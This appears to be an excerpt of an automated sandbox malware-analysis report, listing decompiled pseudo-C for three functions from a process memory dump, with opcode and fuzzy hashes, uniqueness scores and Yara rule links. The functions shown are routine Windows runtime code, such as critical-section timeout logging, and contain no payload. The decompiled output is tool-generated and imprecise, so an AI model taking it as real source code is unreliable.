                                      • API String ID:
                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                      • Instruction ID: c496b7b424d20d54016b37cf8a245fc8b870bce0b4f38e5a80690b3a267d2fa5
                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                      • Instruction Fuzzy Hash: 7DB09234302941CFCE16DF18C180B1533E8FB44A40B8800D0E400CBA20D229E8008900
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F2ACB, Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036F2ACB() {
				void* _t5;

				return E036DEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                      0x036f2adc

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                      • Instruction ID: a87c9b7788c5eb30d2444c559bedc59bc75fa01b374ccced4b26ae22a4f47f46
                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                      • Instruction Fuzzy Hash: 61B01232C11640CFCF02FF40C710B197331FB00750F05449490012F930C229BC01CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0375FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 53%
                                      			E0375FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0370CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03755720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03755720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                      0x0375fdda
                                      0x0375fde2
                                      0x0375fde5
                                      0x0375fdec
                                      0x0375fdfa
                                      0x0375fdff
                                      0x0375fe0a
                                      0x0375fe0f
                                      0x0375fe17
                                      0x0375fe1e
                                      0x0375fe19
                                      0x0375fe19
                                      0x0375fe19
                                      0x0375fe20
                                      0x0375fe21
                                      0x0375fe22
                                      0x0375fe25
                                      0x0375fe40

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0375FDFA
                                      Strings
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0375FE2B
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0375FE01
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 9e5e6f0a230303ab611148bbb2ac00dadfa5fb1a034aa2fc7aa6941d889b3bf5
                                      • Instruction ID: b66bbbc5c7bfa2bc336b51d06531c702ff0377fee1a58746254c24e206f1284f
                                      • Opcode Fuzzy Hash: 9e5e6f0a230303ab611148bbb2ac00dadfa5fb1a034aa2fc7aa6941d889b3bf5
                                      • Instruction Fuzzy Hash: 87F02B76240601BFE6259A45DC06F63BFAAEB45730F240718FA285A1D1DAA3F87097F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%